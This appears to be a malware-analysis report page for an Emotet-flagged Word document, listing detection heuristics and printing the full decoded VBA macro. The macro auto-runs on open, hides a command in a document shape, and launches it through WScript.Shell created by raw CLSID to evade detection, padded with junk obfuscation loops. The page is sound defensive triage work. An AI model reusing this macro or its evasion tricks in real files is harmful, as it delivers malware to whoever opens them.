MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059.001 PowerShell
The sample contains VBA macros, including an AutoOpen macro, and triggers critical heuristics for dangerous COM class instantiation (WScript.Shell) and PowerShell references. ClamAV detection explicitly names this as Emotet. The VBA script likely downloads and executes a second-stage payload, a common Emotet behavior.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6826436-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6826436-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Next Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Next Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9149 bytes |
SHA-256: 494358406b44d4a6fc668ce5d7d163560309e9a89eb9a2586eea8972eb14f291 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
200 of 295 identifiers look randomly generated (e.g. 'wMKHcAzziDiJoN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GHlvGiLjQZRfJI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case CAikiN
Case 200350173
alzUDluK = CBool(LftlYkd)
UllYsjaI = 163477573
Case 8489310
IjVKbcMGQ = Atn(ttJCFajh)
dPBCJcs = Atn(106123896 * CLng(219515996))
End Select
For Each YMikC In qpVSI
dNBbsc = nFqbwXc * CDate(dLiiM * BrUPIHAP) * OOTRmnBi / Sin(QuuzhlhM) / uNinkwh + 184228117 - 143717444 + Chr(218395260) + (jUVYUc * dGqTbc)
Next
On Error Resume Next
Select Case HFwVt
Case 101068852
DLcqzfQ = CBool(mKsok)
WsMIJ = 338699924
Case 113710492
owjDY = Atn(wqwljEI)
BzpjFKOZ = Atn(88785698 * CLng(227771095))
End Select
For Each wkNlMjPEw In iHtGmHv
HHjwjr = TZtHqP * CDate(AIctjFlB * zKQXpv) * TCTNGbP / Sin(BWVsJWzIH) / GlitXpZFq + 217676747 - 255488994 + Chr(127595927) + (ZYzaEX * iZtdr)
Next
Set truBBIdj = Shapes("wMKHcAzziDiJoN")
On Error Resume Next
Select Case PCRzY
Case 134553816
HnnCbXM = CBool(GOvTq)
krhjrzSHi = 329734716
Case 157868736
IaowBb = Atn(XGqBI)
mziSQCoa = Atn(61155885 * CLng(200139268))
End Select
For Each jNjVF In FpiHOlRJN
OTmuqZ = FzjpRvjsz * CDate(iMnvjSGlL * hYORIDi) * HWjTKTb / Sin(VJnuuPO) / mwZYiBfJ + 203777484 - 313560371 + Chr(85070614) + (lSjOMKlc * KCUUOw)
Next
On Error Resume Next
Select Case jwoXzCS
Case 160387474
iBIPa = CBool(LWYNI)
fVwAqFGr = 198255916
Case 248380389
OmdNG = Atn(NmCMw)
ddWvlCDG = Atn(215064564 * CLng(76585925))
End Select
For Each EdpWHwLh In ssudzoF
KbGcjkV = TKVoafd * CDate(CZkQi * qriTr) * iswwzhwF / Sin(HVsTz) / lpsBNOsb + 158931478 - 25449682 + Chr(269434100) + (ElPzPskoa * ZrsiXz)
Next
On Error Resume Next
Select Case VOCMHj
Case 33813296
rczbCLz = CBool(ulZqowfHG)
FblziG = 130726617
Case 66350899
XSQOXVkjq = Atn(OWONpKjOb)
ZjuGrii = Atn(276290620 * CLng(298813341))
End Select
For Each sHsRcYdXB In DMpRstr
vnzssk = nXKWtru * CDate(vzGdzlRjM * FVMudN) * mQuFvAOHv / Sin(ASAHdJWt) / lQtciG + 258777577 - 206472284 + Chr(256715640) + (ItuzYG * AkAwsVB)
Next
On Error Resume Next
Select Case lsbQcOBJ
Case 300286864
FZDEHmin = CBool(JBGfv)
rUCWzm = 256552750
Case 111763715
zAvcRci = Atn(wtUlw)
kznCLc = Atn(229898726 * CLng(206662340))
End Select
For Each fAluwm In vSIfFHrFV
fwHmais = SZMjb * CDate(pUnPcjif * EzCdTI) * FhhnzmX / Sin(EVsojNi) / rTplTb + 194182916 - 270079369 + Chr(279754607) + (fDoYAZwoT * CoqDwMK)
Next
On Error Resume Next
Select Case POwJmjjCq
Case 23561588
lzrNU = CBool(illJw)
vlFjQdG = 260448566
Case 187645281
IkUMDmjQG = Atn(nnuWUish)
bZoQj = Atn(21955386 * CLng(155007173))
End Select
For Each zTYkQinp In tHAsC
CKrHqjM = kZlAYUUk * CDate(jGjzh * XJHhN) * ljJZElGr / Sin(jznhoKidO) / mIwUlS + 154802463 - 134220942 + Chr(36948453) + (wjBzBz * cbUiOtMzI)
Next
WLnTujPc = "" + zEWlLJdW + DswwGUm + truBBIdj.TextFrame.TextRange.Text + TpruDJ + mpHQWBw
On Error Resume Next
Select Case rrQNbEKE
Case 305056879
btTrtQp = CBool(LIwqwEqbz)
BUVbwJIHP = 166477135
Case 50815001
STTidi = Atn(TsZXqack)
uLXzH = Atn(107722713 * CLng(19349856))
End Select
For Each HzzJjlB In jwpcXN
IvdBcwi = UYHMD * CDate(HHCQt * ikWkHYH) * dmIdj / Sin(OEdOaccz) / kbYzNbp + 258253576 - 82005530 + Chr(193161781) + (wXYsuDoX * hQdfSnD)
Next
On Error Resume Next
Select Case zXsTSdt
Case 42614205
RKpvUH = CBool(zYoFYat)
HutNq = 84508137
Case 336164859
GBcBSfE = Atn(vJDUaWhZ)
HiwojFWd = Atn(292309995 * CLng(79490976))
End Select
For Each kfQzSni In sGJUUFJOX
akMTdii = iavGX * CDate(TjwPtDC * onhdwOci) * qwFRbMQ / Sin(iVQFI) / ljiAnHtVT + 145843106 - 264389350 + Chr(319396403) + (lAjPazC * HSIsU)
Next
On Error Resume Next
Select Case ZkcjiNj
Case 17259095
Mcwaaw = CBool(cpFUBz)
uzWOF = 270253963
Case 317696796
DDhjIBh = Atn(unWVwHnjp)
YddwRWca = Atn(224384056 * CLng(239743549))
End Select
For Each zbNOh In stunQvu
jibLmL = YSQSBGmK * CDate(iTzmv * JHQiun) * zIhimkrAO / Sin(YTaIwvjTG) / qEwwHPUV + 130944220 - 313356750 + Chr(25980118) + (BdTIkS * BSDUXY)
Next
Set SaPNcWTvi = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + EMLkPo + EuLjb + QWjSrHR + onKNzEQnk)
On Error Resume Next
Select Case pTJWJDu
Case 130061425
PbCzzAHHu = CBool(PnJlbhDjp)
vGGHpFZ = 295027199
Case 87210130
kzpKu = Atn(fbzlSDT)
wnfhi = Atn(264510804 * CLng(43771083))
End Select
For Each FsBJUv In rbPur
RzzrB = bjEIs * CDate(wJCarKZw * szIkFj) * HKDIbz / Sin(pjqjlfjB) / JWWmFRjE + 140665921 - 304701070 + Chr(285387949) + (zqGwTHb * EjLwdMtAd)
Next
On Error Resume Next
Select Case knrDp
Case 292977149
dkVFpIC = CBool(EbCBzVopI)
KLcZLri = 215309991
Case 244714176
dQSThJmwm = Atn(AjRVBYDZn)
vzicfhwE = Atn(166204397 * CLng(200008541))
End Select
For Each IWHVnIj In qirDSa
tHYnoFt = wjiqnzNiX * CDate(PsMJz * PTEzDD) * QBEnojlqV / Sin(XJpFSw) / cAUvCiN + 239272776 - 51710128 + Chr(69234694) + (UAwwulR * iMYBlRud)
Next
On Error Resume Next
Select Case QctLmEVrJ
Case 287645940
XwZKOlG = CBool(SJbQDAV)
NTSjU = 257720664
Case 159450716
qjCRi = Atn(WwMUL)
iuIwrhIn = Atn(272092150 * CLng(78596568))
End Select
For Each KRzHXqIKk In WUijolI
dDjpoWTK = rmikOiq * CDate(AjCwHDJbI * ZaODvz) * MIHVccoMV / Sin(YFnIqr) / oCGoVzZNf + 72780441 - 297536805 + Chr(238043942) + (oqilB * jVXHOml)
Next
On Error Resume Next
Select Case TRisJl
Case 156721110
kGpYs = CBool(HOKsE)
kizucm = 229373156
Case 330954107
hszNQUzcu = Atn(BEAdS)
ilLQBj = Atn(110292794 * CLng(120405499))
End Select
For Each jkTnPWCZ In COqLc
ImQrCOjF = dwAXhwB * CDate(hihjfoi * wfAaEbS) * XIOQY / Sin(TzfpKQ) / isBBmIh + 304838634 - 26401291 + Chr(186255302) + (lOEjjfaBj * AYklCRKiE)
Next
On Error Resume Next
Select Case rGZSE
Case 187529650
ddpThIh = CBool(MDTuwGE)
nftEZoD = 325605272
Case 177366906
JrkztuJwu = Atn(ucDzbHi)
NzWznfl = Atn(256849972 * CLng(74300571))
End Select
For Each woZrtjz In qPJZlwLbj
bwdRFf = daJEFMGj * CDate(BGCDjUwl * TOnLYo) * zaLOti / Sin(uHPIplkD) / qAwFZ + 191256882 - 185361611 + Chr(47798252) + (rzlQwRCVt * lvUrX)
Next
Const nnzBtTApZRD = 0
On Error Resume Next
Select Case JwjsB
Case 33473383
fdcCAt = CBool(QlHvuHjSo)
jHMEcaN = 268094437
Case 300080494
NTtaQDR = Atn(fSwbo)
fdbDsFYqK = Atn(59047053 * CLng(77208763))
End Select
For Each sHCCONGUd In rjirqbmVd
TPYzz = voAWJ * CDate(OWKJGcDj * UThluYB) * zEofGZ / Sin(iCDERST) / oGSIj + 212963522 - 135590833 + Chr(66556945) + (ujzvrO * luZDS)
Next
On Error Resume Next
Select Case ZqbYzTk
Case 150733697
kQajtKlWa = CBool(SFVdLIE)
qbwtE = 148175404
Case 325170744
BoRVhZnBU = Atn(LljWN)
XGKPEN = Atn(101045271 * CLng(100221268))
End Select
For Each LuvAqLDjv In wFEvs
TILzTY = OlWwMh * CDate(oYCcWisAi * HBoOQHSK) * zkEDRZ / Sin(bhOTNrBB) / XDbZNZ + 124531626 - 200440683 + Chr(149762382) + (RkFziDnuk * kVkDj)
Next
On Error Resume Next
Select Case WEQtVtZ
Case 240856317
ZELnVSrY = CBool(EwZEw)
WviWnYdhh = 257594296
Case 145892682
SjMilw = Atn(RnBiX)
bhqYrw = Atn(120466578 * CLng(37472293))
End Select
For Each XZOCzKv In dAzwYrt
NcBhFUN = CLqnI * CDate(qDNvJmUiz * VQXhXUCqw) * iURYR / Sin(MGzlT) / OnKvk + 194511522 - 224716893 + Chr(48174023) + (icILp * fkiIAqFLW)
Next
SaPNcWTvi.Run# WLnTujPc, nnzBtTApZRD
On Error Resume Next
Select Case bCuCUjvM
Case 277554270
TutKlGlB = CBool(DLfJDWEFz)
OJcIcmd = 165104515
Case 295670195
iCzOp = Atn(IzAGECIEd)
wtqfPdv = Atn(264955666 * CLng(182187039))
End Select
For Each qmRYHjs In IBNQTKOHE
SMBYiGpji = qEHJmN * CDate(VjcwX * MvcHf) * fRHYCVP / Sin(SHKjYwf) / EtEdG + 54726877 - 292026154 + Chr(176318176) + (uvCocBw * JCvij)
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.